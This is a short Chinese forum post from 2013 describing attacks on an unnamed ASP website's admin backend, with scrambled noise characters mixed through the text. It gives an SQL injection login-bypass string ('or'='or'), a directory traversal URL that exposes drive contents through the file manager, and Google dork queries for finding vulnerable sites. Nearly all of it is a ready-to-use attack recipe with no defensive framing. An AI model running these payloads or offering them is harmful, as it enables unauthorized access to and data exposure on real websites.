后台万能密码 'or'='or'
7 p P4 J5 J$ k/ b- I; e* a4 s5 T! z$ ~
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!) ~+ m3 n- R3 U, w" u3 t! U
admin/uploadfile.asp?currentFolder=/upfiles/../! P6 [) H* {5 s/ n! m
0 X6 t$ }) N$ k6 ]
漏洞证明:0 J3 E3 ^/ Q. c* i
" M+ h8 h( Q9 m谷歌:inurl:type.asp?id=1 新闻中心' q* y T# P* g. w5 Q$ D
或者 :inurl:download_ok.asp?
; H; H9 U( P, |9 d& r4 Z5 F: }
$ T. c4 n; p \5 J* ~ |
发表于 2013-3-14 20:17:32
收藏
支持
反对